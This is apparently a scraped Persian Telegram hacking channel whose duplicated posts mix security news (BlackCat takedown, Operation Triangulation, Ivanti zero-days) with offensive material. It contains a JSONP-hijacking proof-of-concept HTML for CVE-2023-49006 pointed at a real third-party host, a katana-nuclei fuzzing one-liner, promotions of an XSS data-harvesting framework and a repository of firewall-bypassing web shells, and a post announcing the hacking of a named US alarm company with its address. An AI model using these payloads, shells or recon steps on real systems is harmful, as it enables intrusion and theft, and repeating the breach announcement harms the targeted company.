KASRAONE
Photo
🔴 باج افزاره گربه سیاه
اف بي آي نرم افزار باج گربه سياه رو از کار انداخت و يه ابزار رمزگشايي مجاني رو منتشر کرد
وزارت دادگستری ایالات متحده رسما از تخریب عملیات باج افزار BlackCat خبر داد و یک ابزار رمزگشایی را منتشر کرد که قربانیان می توانند برای دسترسی مجدد به فایل های قفل شده توسط بدافزار استفاده کنند.
اسناد دادگاه نشان می دهد که اداره تحقیقات فدرال ایالات متحده (FBI) یک مخبر انسانی محرمانه (CHS) را به عنوان یک عضو وابسته به BlackCat استخدام کرده و به پنل شبکه ای که برای مدیریت قربانیان باند استفاده می شود دسترسی پیدا کرده است. این یک مورد هک کردن هکرها است.
BlackCat (BlackCat) ، همچنین به عنوان ALPHV و Noberus شناخته می شود ، در ابتدا در دسامبر 2021 ظاهر شد و از آن زمان به دومین نسخه فعال باج افزار به عنوان یک سرویس (باج به عنوان یک سرویس) در جهان تبدیل شده است LockBit.It همچنین اولین نرم افزار باج گیری مبتنی بر زبان زنگ است که در طبیعت کشف شده است.
اف بی آی گفت که با ده ها قربانی در ایالات متحده برای اجرای رویه های رمزگشایی که آنها را از مطالبات باج به مبلغ حدود 68 میلیون دلار آمریکا معاف می کند ، کار کرده است و همچنین بینش شبکه کامپیوتری نرم افزار باج را به دست آورده است ، و آن را قادر می سازد تا 946 جفت کلید عمومی/خصوصی را که برای میزبانی وب سایت TOR که توسط سازمان اداره می شود و از بین بردن آن استفاده می شود ، جمع آوری کند.
LINK
https://thehackernews.com/2023/12/fbi-takes-down-blackcat-ransomware.html?m=1
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
اف بي آي نرم افزار باج گربه سياه رو از کار انداخت و يه ابزار رمزگشايي مجاني رو منتشر کرد
وزارت دادگستری ایالات متحده رسما از تخریب عملیات باج افزار BlackCat خبر داد و یک ابزار رمزگشایی را منتشر کرد که قربانیان می توانند برای دسترسی مجدد به فایل های قفل شده توسط بدافزار استفاده کنند.
اسناد دادگاه نشان می دهد که اداره تحقیقات فدرال ایالات متحده (FBI) یک مخبر انسانی محرمانه (CHS) را به عنوان یک عضو وابسته به BlackCat استخدام کرده و به پنل شبکه ای که برای مدیریت قربانیان باند استفاده می شود دسترسی پیدا کرده است. این یک مورد هک کردن هکرها است.
BlackCat (BlackCat) ، همچنین به عنوان ALPHV و Noberus شناخته می شود ، در ابتدا در دسامبر 2021 ظاهر شد و از آن زمان به دومین نسخه فعال باج افزار به عنوان یک سرویس (باج به عنوان یک سرویس) در جهان تبدیل شده است LockBit.It همچنین اولین نرم افزار باج گیری مبتنی بر زبان زنگ است که در طبیعت کشف شده است.
اف بی آی گفت که با ده ها قربانی در ایالات متحده برای اجرای رویه های رمزگشایی که آنها را از مطالبات باج به مبلغ حدود 68 میلیون دلار آمریکا معاف می کند ، کار کرده است و همچنین بینش شبکه کامپیوتری نرم افزار باج را به دست آورده است ، و آن را قادر می سازد تا 946 جفت کلید عمومی/خصوصی را که برای میزبانی وب سایت TOR که توسط سازمان اداره می شود و از بین بردن آن استفاده می شود ، جمع آوری کند.
LINK
https://thehackernews.com/2023/12/fbi-takes-down-blackcat-ransomware.html?m=1
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
⚡1
🔴 Android Penetration Part 1
MEDIUOM
https://medium.com/p/b82b0d06e360
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
MEDIUOM
https://medium.com/p/b82b0d06e360
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
KASRAONE
Photo
«پیچیدهترین» زنجیره حمله آیفون که تا به حال ایجاد شده است - از چهار آسیبپذیری روز صفر برای ایجاد یک اکسپلویت با کلیک صفر استفاده میکند.
بین سالهای 2019 و دسامبر 2022، یک آسیبپذیری بسیار پیشرفته iMessage ظاهر شد که محققان امنیتی Kaspersky که در نهایت آن را کشف کردند، آن را Operation Triangulation نامیدند. اکنون، آنها آنچه را که درباره «پیچیدهترین زنجیره حملهای که تا به حال دیدهاند» به اشتراک میگذارند.
امروز در کنفرانس ارتباطات آشوب، محققان امنیتی کسپرسکی بوریس لارین، لئونید بزویچنکو و گئورگی کوچرین در مورد "عملیات مثلث" سخنرانی کردند. این اولین باری است که این سه نفر «تمام آسیبپذیریها و جزئیات آسیبپذیری مورد استفاده در حملات پیشرفته iMessage را به صورت عمومی افشا میکنند».
محققان همچنین تمام کارهای خود را امروز در وبلاگ Kaspersky SecureList به اشتراک گذاشتند.
در زیر زنجیره حمله کامل و پیچیده شامل چهار آسیبپذیری روز صفر مورد استفاده برای دسترسی ریشه به دستگاه قربانی است:
• مهاجم یک پیوست iMessage مخرب ارسال می کند، که برنامه بدون نشان دادن هیچ نشانه ای به کاربر، آن را پردازش می کند.
• این پیوست از آسیبپذیری اجرای کد از راه دور فقط برای اپل، CVE-2023-41990 در دستورالعمل فونت ADJUST TrueType سوء استفاده میکند. این دستورالعمل از اوایل دهه نود وجود داشت تا زمانی که یک پچ آن را حذف کرد.
• از برنامه نویسی بازگشتی/پرش گرا و چندین مرحله نوشته شده در زبان پرس و جو NSExpression/NSPredicate برای اجرای یک اکسپلویت افزایش امتیاز نوشته شده در جاوا اسکریپت با وصله محیط کتابخانه JavaScriptCore استفاده می کند.
• این کد اکسپلویت جاوا اسکریپت مبهم شده است تا کاملاً ناخوانا شود و اندازه آن تا حد امکان کاهش یابد. با این وجود، تقریباً شامل 11000 خط کد است که عمدتاً برای تجزیه و دستکاری حافظه JavaScriptCore و هسته است.
• از ویژگی اشکال زدایی DollarVM ($vm) JavaScriptCore استفاده می کند تا توانایی دستکاری حافظه JavaScriptCore و اجرای توابع API بومی را از اسکریپت ها به دست آورد.
• این برنامه برای پشتیبانی از آیفون های قدیمی و جدید طراحی شده است و دارای ویژگی دور زدن کد تأیید هویت اشاره گر (PAC) برای بهره برداری از مدل های اخیر است.
• از آسیب پذیری سرریز اعداد صحیح CVE-2023-32434 در فراخوانی های سیستم نقشه برداری حافظه XNU (mach_make_memory_entry و vm_map) برای دسترسی خواندن/نوشتن به کل حافظه فیزیکی دستگاه در سطح کاربر سوء استفاده می کند.
• از رجیسترهای I/O (MMIO) نگاشت شده حافظه سخت افزاری برای دور زدن لایه حفاظتی صفحه (PPL) استفاده می کند. این مشکل به عنوان CVE-2023-38606 کاهش یافته است.
• پس از اینکه تمام آسیبپذیریها مورد سوء استفاده قرار گرفتند، اکسپلویت جاوا اسکریپت میتواند هر کاری را که میخواهد با دستگاه انجام دهد، از جمله اجرای نرمافزارهای جاسوسی، اما مهاجم تصمیم میگیرد: (الف) فرآیند IMAgent را راهاندازی کند و ابزار مؤثری را تزریق کند که آثار سوء استفاده را بر روی دستگاه پاک کند. بار دستگاه؛ (ب) فرآیند سافاری را در حالت مخفی اجرا می کند و آن را به یک صفحه وب با محتوای مرحله بعدی ارسال می کند.
• یک اسکریپت در صفحه وب وجود دارد که قربانی را احراز هویت می کند و در صورت عبور از چک، مرحله بعدی را دریافت می کند: Safari exploit.
• آسیب پذیری سافاری از CVE-2023-32435 برای اجرای کد پوسته سوء استفاده می کند.
• Shellcode یک اکسپلویت هسته دیگری را در قالب یک فایل شی Mach اجرا کرد. از همان آسیب پذیری ها استفاده می کند: CVE-2023-32434 و CVE-2023-38606. همچنین از نظر اندازه و عملکرد بسیار بزرگ است، اما چیزی شبیه یک اکسپلویت هسته نوشته شده در جاوا اسکریپت نیست. برخی از بخش های مربوط به اکسپلویت فوق برای هر دو مشترک است. با این حال، بسیاری از کد آن نیز به تجزیه و دستکاری حافظه هسته اختصاص دارد. این شامل ابزارهای مختلف پس از بهره برداری است که عمدتاً استفاده نمی شوند.
• این آسیبپذیری امتیازات ریشه را به دست میآورد و به مراحل دیگری که نرمافزارهای جاسوسی بارگیری میشوند ادامه میدهد. در پست قبلی به این مراحل پرداختیم.
LINK
https://9to5mac.com/2023/12/27/most-sophisticated-iphone-attack-chain-ever-seen/
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
بین سالهای 2019 و دسامبر 2022، یک آسیبپذیری بسیار پیشرفته iMessage ظاهر شد که محققان امنیتی Kaspersky که در نهایت آن را کشف کردند، آن را Operation Triangulation نامیدند. اکنون، آنها آنچه را که درباره «پیچیدهترین زنجیره حملهای که تا به حال دیدهاند» به اشتراک میگذارند.
امروز در کنفرانس ارتباطات آشوب، محققان امنیتی کسپرسکی بوریس لارین، لئونید بزویچنکو و گئورگی کوچرین در مورد "عملیات مثلث" سخنرانی کردند. این اولین باری است که این سه نفر «تمام آسیبپذیریها و جزئیات آسیبپذیری مورد استفاده در حملات پیشرفته iMessage را به صورت عمومی افشا میکنند».
محققان همچنین تمام کارهای خود را امروز در وبلاگ Kaspersky SecureList به اشتراک گذاشتند.
در زیر زنجیره حمله کامل و پیچیده شامل چهار آسیبپذیری روز صفر مورد استفاده برای دسترسی ریشه به دستگاه قربانی است:
• مهاجم یک پیوست iMessage مخرب ارسال می کند، که برنامه بدون نشان دادن هیچ نشانه ای به کاربر، آن را پردازش می کند.
• این پیوست از آسیبپذیری اجرای کد از راه دور فقط برای اپل، CVE-2023-41990 در دستورالعمل فونت ADJUST TrueType سوء استفاده میکند. این دستورالعمل از اوایل دهه نود وجود داشت تا زمانی که یک پچ آن را حذف کرد.
• از برنامه نویسی بازگشتی/پرش گرا و چندین مرحله نوشته شده در زبان پرس و جو NSExpression/NSPredicate برای اجرای یک اکسپلویت افزایش امتیاز نوشته شده در جاوا اسکریپت با وصله محیط کتابخانه JavaScriptCore استفاده می کند.
• این کد اکسپلویت جاوا اسکریپت مبهم شده است تا کاملاً ناخوانا شود و اندازه آن تا حد امکان کاهش یابد. با این وجود، تقریباً شامل 11000 خط کد است که عمدتاً برای تجزیه و دستکاری حافظه JavaScriptCore و هسته است.
• از ویژگی اشکال زدایی DollarVM ($vm) JavaScriptCore استفاده می کند تا توانایی دستکاری حافظه JavaScriptCore و اجرای توابع API بومی را از اسکریپت ها به دست آورد.
• این برنامه برای پشتیبانی از آیفون های قدیمی و جدید طراحی شده است و دارای ویژگی دور زدن کد تأیید هویت اشاره گر (PAC) برای بهره برداری از مدل های اخیر است.
• از آسیب پذیری سرریز اعداد صحیح CVE-2023-32434 در فراخوانی های سیستم نقشه برداری حافظه XNU (mach_make_memory_entry و vm_map) برای دسترسی خواندن/نوشتن به کل حافظه فیزیکی دستگاه در سطح کاربر سوء استفاده می کند.
• از رجیسترهای I/O (MMIO) نگاشت شده حافظه سخت افزاری برای دور زدن لایه حفاظتی صفحه (PPL) استفاده می کند. این مشکل به عنوان CVE-2023-38606 کاهش یافته است.
• پس از اینکه تمام آسیبپذیریها مورد سوء استفاده قرار گرفتند، اکسپلویت جاوا اسکریپت میتواند هر کاری را که میخواهد با دستگاه انجام دهد، از جمله اجرای نرمافزارهای جاسوسی، اما مهاجم تصمیم میگیرد: (الف) فرآیند IMAgent را راهاندازی کند و ابزار مؤثری را تزریق کند که آثار سوء استفاده را بر روی دستگاه پاک کند. بار دستگاه؛ (ب) فرآیند سافاری را در حالت مخفی اجرا می کند و آن را به یک صفحه وب با محتوای مرحله بعدی ارسال می کند.
• یک اسکریپت در صفحه وب وجود دارد که قربانی را احراز هویت می کند و در صورت عبور از چک، مرحله بعدی را دریافت می کند: Safari exploit.
• آسیب پذیری سافاری از CVE-2023-32435 برای اجرای کد پوسته سوء استفاده می کند.
• Shellcode یک اکسپلویت هسته دیگری را در قالب یک فایل شی Mach اجرا کرد. از همان آسیب پذیری ها استفاده می کند: CVE-2023-32434 و CVE-2023-38606. همچنین از نظر اندازه و عملکرد بسیار بزرگ است، اما چیزی شبیه یک اکسپلویت هسته نوشته شده در جاوا اسکریپت نیست. برخی از بخش های مربوط به اکسپلویت فوق برای هر دو مشترک است. با این حال، بسیاری از کد آن نیز به تجزیه و دستکاری حافظه هسته اختصاص دارد. این شامل ابزارهای مختلف پس از بهره برداری است که عمدتاً استفاده نمی شوند.
• این آسیبپذیری امتیازات ریشه را به دست میآورد و به مراحل دیگری که نرمافزارهای جاسوسی بارگیری میشوند ادامه میدهد. در پست قبلی به این مراحل پرداختیم.
LINK
https://9to5mac.com/2023/12/27/most-sophisticated-iphone-attack-chain-ever-seen/
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
9to5Mac
'Most sophisticated' iPhone attack chain 'ever seen' used four 0-days to create a 0-click exploit - 9to5Mac
Between 2019 and December 2022, an extremely advanced iMessage vulnerability was in the wild that was eventually named “Operation Triangulation”...
❤2
🔍 نکات Bounty Bug: خزیدن پارامترها با Katana برای بردهای سریع XSS/SQLI!
🚀 وقتی صحبت از شکار کارآمد باگ می شود، خزیدن فعال می تواند بازی را تغییر دهد. یکی از ابزارهایی که من به آن تکیه می کنم کاتانا است که به بازیابی URL ها و پارامترها برای آزمایش کامل در برابر XSS، SQLI، SSTI و موارد دیگر کمک می کند.
👉 در اینجا یک خط یک خطی است که این روند را آغاز می کند:
> katana -u http://domain.com -silent -d 15 -rl 500 -jc -c 20 -kf all -ct 2m -sf qurl -o urls.txt
> urless -i urls.txt -o output.txt
> nuclei -l output.txt -t fuzzing-templates/ -silent
🔑 مرحله بعدی چیست؟ URL هایی را که از خزیدن فعال به دست آورده اید، بردارید، موارد تکراری را با urless حذف کنید و در بررسی های XSS، SQLI و SSTI خود قرار دهید. این استراتژی سطح حمله شما را گسترش میدهد و تشخیص آسیبپذیریها و تضمین آن بردهای سریع را آسانتر میکند.
💡موارد حذفی: استفاده از قابلیتهای کاتانا میتواند به شما کمک کند تا مسائل پنهان را به طور موثر کشف کنید و درآمدهای خود را از مزایای باگ تقویت کنید.
#KASRAONE #Scan
🚀 وقتی صحبت از شکار کارآمد باگ می شود، خزیدن فعال می تواند بازی را تغییر دهد. یکی از ابزارهایی که من به آن تکیه می کنم کاتانا است که به بازیابی URL ها و پارامترها برای آزمایش کامل در برابر XSS، SQLI، SSTI و موارد دیگر کمک می کند.
👉 در اینجا یک خط یک خطی است که این روند را آغاز می کند:
> katana -u http://domain.com -silent -d 15 -rl 500 -jc -c 20 -kf all -ct 2m -sf qurl -o urls.txt
> urless -i urls.txt -o output.txt
> nuclei -l output.txt -t fuzzing-templates/ -silent
🔑 مرحله بعدی چیست؟ URL هایی را که از خزیدن فعال به دست آورده اید، بردارید، موارد تکراری را با urless حذف کنید و در بررسی های XSS، SQLI و SSTI خود قرار دهید. این استراتژی سطح حمله شما را گسترش میدهد و تشخیص آسیبپذیریها و تضمین آن بردهای سریع را آسانتر میکند.
💡موارد حذفی: استفاده از قابلیتهای کاتانا میتواند به شما کمک کند تا مسائل پنهان را به طور موثر کشف کنید و درآمدهای خود را از مزایای باگ تقویت کنید.
#KASRAONE #Scan
⚡3❤2
🔴 Autorize
Link GitHub 🐈
https://github.com/Quitten/Autorize
Autorize
یک تمدید تشخیص اجرای مجوز خودکار برای Burp Suite است. این به زبان پایتون توسط باراک تاویلی ، یک متخصص امنیت برنامه نوشته شده است. Autorize برای کمک به تست کنندگان امنیتی با انجام تست های مجوز خودکار طراحی شده است. با آخرین نسخه در حال حاضر Autorize همچنین تست های احراز هویت خودکار
را انجام می دهد.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Link GitHub 🐈
https://github.com/Quitten/Autorize
Autorize
یک تمدید تشخیص اجرای مجوز خودکار برای Burp Suite است. این به زبان پایتون توسط باراک تاویلی ، یک متخصص امنیت برنامه نوشته شده است. Autorize برای کمک به تست کنندگان امنیتی با انجام تست های مجوز خودکار طراحی شده است. با آخرین نسخه در حال حاضر Autorize همچنین تست های احراز هویت خودکار
را انجام می دهد.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
👍1
نیویورک تایمز از OpenAI و مایکروسافت به دلیل نقض حق چاپ شکایت کرده است
نیویورک تایمز از OpenAI و مایکروسافت شکایت کرده و میگوید این شرکتها اکنون با «کپی کردن و استفاده از میلیونها مقاله» از مقالههای این نشریه برای ساخت مدلهای هوش مصنوعی خود، به طور مستقیم با محتوای نشریه رقابت میکنند. و خواستار این شدند که آنها در قبال "میلیاردها دلار خسارت قانونی و واقعی" به دلیل کپی برداری ادعایی از آثارشان مسئول باشند.
طبق این شکایت، تایمز ادعا میکند که مدلهای زبان بزرگ OpenAI و مایکروسافت (LLM) که ChatGPT و Copilot را هدایت میکنند، «قادر به تولید خروجی هستند که دقیقاً محتوای تایمز را تکرار میکند، محتوای آن را از نزدیک خلاصه میکند و سبک ارائه آن را تقلید میکند. این سازمان رسانه ای گفت که این امر رابطه تایمز با خوانندگان را "کاهش و آسیب رسانده" و در عین حال آن را از "اشتراک، مجوز، تبلیغات و درآمد وابسته" محروم کرده است.
🔴 ادامه خبر در لینک
LINK
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
نیویورک تایمز از OpenAI و مایکروسافت شکایت کرده و میگوید این شرکتها اکنون با «کپی کردن و استفاده از میلیونها مقاله» از مقالههای این نشریه برای ساخت مدلهای هوش مصنوعی خود، به طور مستقیم با محتوای نشریه رقابت میکنند. و خواستار این شدند که آنها در قبال "میلیاردها دلار خسارت قانونی و واقعی" به دلیل کپی برداری ادعایی از آثارشان مسئول باشند.
طبق این شکایت، تایمز ادعا میکند که مدلهای زبان بزرگ OpenAI و مایکروسافت (LLM) که ChatGPT و Copilot را هدایت میکنند، «قادر به تولید خروجی هستند که دقیقاً محتوای تایمز را تکرار میکند، محتوای آن را از نزدیک خلاصه میکند و سبک ارائه آن را تقلید میکند. این سازمان رسانه ای گفت که این امر رابطه تایمز با خوانندگان را "کاهش و آسیب رسانده" و در عین حال آن را از "اشتراک، مجوز، تبلیغات و درآمد وابسته" محروم کرده است.
🔴 ادامه خبر در لینک
LINK
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
😁1😍1
KASRAONE
(CSRF) ♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲ ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ K1 kasraone
🔴 CVE-2023-49006
آسیب پذیری Cross Site Request Forgery (CSRF) در Phpsysinfo نسخه 3.4.3 به مهاجم از راه دور اجازه می دهد تا اطلاعات حساس را از طریق یک صفحه دستکاری شده در فایل XML.php به دست آورد.
phpsysinfo v3.4.3
دارای آسیب پذیری JSONP است. فایل XML.php دارای آسیب پذیری JSONP hijacking است. هنگامی که کاربر از صفحه ای بازدید می کند که با دقت توسط مهاجم ساخته شده است، داده های JSON به دست می آید و برای مهاجم ارسال می شود.
حالا فرآینده این حمله چطوری است ؟
به سادگی از یک فایل PHP برای ارسال داده های JSON بازیابی شده به سرور خود با استفاده از XMLHttpRequest استفاده می کند.
در اینجا کد HTML برای اثبات فایل مفهومی آمده است:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title></title>
<script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script>
</head>
<body>
<script>
function dezsbrxdio(data){ alert(JSON.stringify(data)); }
</script>
<script src="https://phpbb.trabitechnik.com/xml.php?json&callback=dezsbrxdio&jsonp=dezsbrxdio&cb=dezsbrxdio&json=dezsbrxdio">
</script>
</body>
</html>
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
آسیب پذیری Cross Site Request Forgery (CSRF) در Phpsysinfo نسخه 3.4.3 به مهاجم از راه دور اجازه می دهد تا اطلاعات حساس را از طریق یک صفحه دستکاری شده در فایل XML.php به دست آورد.
phpsysinfo v3.4.3
دارای آسیب پذیری JSONP است. فایل XML.php دارای آسیب پذیری JSONP hijacking است. هنگامی که کاربر از صفحه ای بازدید می کند که با دقت توسط مهاجم ساخته شده است، داده های JSON به دست می آید و برای مهاجم ارسال می شود.
حالا فرآینده این حمله چطوری است ؟
به سادگی از یک فایل PHP برای ارسال داده های JSON بازیابی شده به سرور خود با استفاده از XMLHttpRequest استفاده می کند.
در اینجا کد HTML برای اثبات فایل مفهومی آمده است:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title></title>
<script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script>
</head>
<body>
<script>
function dezsbrxdio(data){ alert(JSON.stringify(data)); }
</script>
<script src="https://phpbb.trabitechnik.com/xml.php?json&callback=dezsbrxdio&jsonp=dezsbrxdio&cb=dezsbrxdio&json=dezsbrxdio">
</script>
</body>
</html>
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
❤5👍2😍1
یک شرکت فرانسوی اولین آینه هوشمند هوش مصنوعی جهان را عرضه کرد: این آینه می تواند احساسات کاربران را شناسایی کند و استرس را از بین ببرد.
در طول نمایشگاه CES 2024، یک شرکت فناوری سلامت هوشمند فرانسوی به نام Baracoda اولین آینه هوشمند هوش مصنوعی جهان BMind را منتشر کرد. طبق بیانیه رسمی، این آینه ای است که مخصوص سلامت روان طراحی شده است که می تواند احساسات را شناسایی کرده و به مدیریت استرس کمک کند.
از نظر تعامل، کاربران می توانند از طریق صدا، حرکات و غیره با آینه ارتباط برقرار کنند، به عنوان مثال، مشت زدن یا ضربه زدن می تواند به منوی اصلی بازگردد و ژست برای انتخاب محتوای فعلی یک انگشت است.
Link
https://www.ithome.com/0/743/950.htm
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
در طول نمایشگاه CES 2024، یک شرکت فناوری سلامت هوشمند فرانسوی به نام Baracoda اولین آینه هوشمند هوش مصنوعی جهان BMind را منتشر کرد. طبق بیانیه رسمی، این آینه ای است که مخصوص سلامت روان طراحی شده است که می تواند احساسات را شناسایی کرده و به مدیریت استرس کمک کند.
از نظر تعامل، کاربران می توانند از طریق صدا، حرکات و غیره با آینه ارتباط برقرار کنند، به عنوان مثال، مشت زدن یا ضربه زدن می تواند به منوی اصلی بازگردد و ژست برای انتخاب محتوای فعلی یک انگشت است.
Link
https://www.ithome.com/0/743/950.htm
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
👍1😍1
🔴 ezXSS
Git Hub : 🐈
Easy to use dashboard with settings, statistics, payloads, view/share/search reports
🆕 Persistent XSS sessions with reverse proxy aslong as the browser is active
Unlimited users with permissions to personal payloads & their reports
Instant alerts via mail, Telegram, Slack, Discord or custom callback URL
Custom javascript payloads
Custom payload links to distinguish insert points
Extract additional pages, block, whitelist and other filters
Secure your login with Two-factor (2FA)
The following information can be collected on a vulnerable page:
The URL of the page
IP Address
Any page referer (or share referer)
LINKTOOLS
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Git Hub : 🐈
Easy to use dashboard with settings, statistics, payloads, view/share/search reports
🆕 Persistent XSS sessions with reverse proxy aslong as the browser is active
Unlimited users with permissions to personal payloads & their reports
Instant alerts via mail, Telegram, Slack, Discord or custom callback URL
Custom javascript payloads
Custom payload links to distinguish insert points
Extract additional pages, block, whitelist and other filters
Secure your login with Two-factor (2FA)
The following information can be collected on a vulnerable page:
The URL of the page
IP Address
Any page referer (or share referer)
LINKTOOLS
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
👍2
WebShells
Prvi8 PHP AND ASPX Web Shells ( Bypasser Web Shells ) firewall Bypass Shells (web shells)
Imunify360 ByPass ( 403.php )
Git Hub 🐈
https://github.com/sagsooz/Bypass-Webshell
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Prvi8 PHP AND ASPX Web Shells ( Bypasser Web Shells ) firewall Bypass Shells (web shells)
Imunify360 ByPass ( 403.php )
Git Hub 🐈
https://github.com/sagsooz/Bypass-Webshell
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
GitHub
GitHub - sagsooz/Webshell-bypass: A collection of advanced PHP and ASPX web shells designed to bypass security measures.
A collection of advanced PHP and ASPX web shells designed to bypass security measures. - sagsooz/Webshell-bypass
⚡2
🔴 Blind SSRF to Port Scanning through response time
LINK MEDIUM
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
LINK MEDIUM
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Medium
Blind SSRF to Port Scanning through response time
Introduction:
🔴 اطلاعات سازمان آمریکایی توست هکرها هک شد ! : American Alarm and
Communications
که در سال 1971 تاسیس شد و دفتر مرکزی آن در آرلینگتون، ماساچوست، مستقر است، American Alarm and Communications
یک شرکت ادغام و نظارت بر سیستم های امنیتی 24 ساعته است. در American Alarm ما به حفاظت محلی و قابل اعتماد اعتقاد داریم. ما از سال 1971 از خانهها و مشاغل در سراسر نیوانگلند محافظت میکنیم. شرکت ما با متخصصان متعهد کار میکند که در جوامعی که به آنها خدمت میکنند زندگی میکنند - شاید حتی در همسایگی شما.
سایت: www.americanalarm.com
نشانی:
297 برادوی، آرلینگتون،
ماساچوست، 02474،
ایالات متحده
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Communications
که در سال 1971 تاسیس شد و دفتر مرکزی آن در آرلینگتون، ماساچوست، مستقر است، American Alarm and Communications
یک شرکت ادغام و نظارت بر سیستم های امنیتی 24 ساعته است. در American Alarm ما به حفاظت محلی و قابل اعتماد اعتقاد داریم. ما از سال 1971 از خانهها و مشاغل در سراسر نیوانگلند محافظت میکنیم. شرکت ما با متخصصان متعهد کار میکند که در جوامعی که به آنها خدمت میکنند زندگی میکنند - شاید حتی در همسایگی شما.
سایت: www.americanalarm.com
نشانی:
297 برادوی، آرلینگتون،
ماساچوست، 02474،
ایالات متحده
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
😱2
🔴 CISA
دستورالعمل اضطراری را به آژانس های فدرال در مورد سوء استفاده های Ivanti Zero-Day صادر می کند
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday issued an emergency directive urging Federal Civilian Executive Branch (FCEB) agencies to implement mitigations against two actively exploited zero-day flaws in Ivanti Connect Secure (ICS) and Ivanti Policy Secure (IPS) products.
The development arrives as the vulnerabilities – an authentication bypass (CVE-2023-46805) and a code injection bug (CVE-2024-21887) – have come under widespread exploitation by multiple threat actors. The flaws allow a malicious actor to craft malicious requests and execute arbitrary commands on the system.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
دستورالعمل اضطراری را به آژانس های فدرال در مورد سوء استفاده های Ivanti Zero-Day صادر می کند
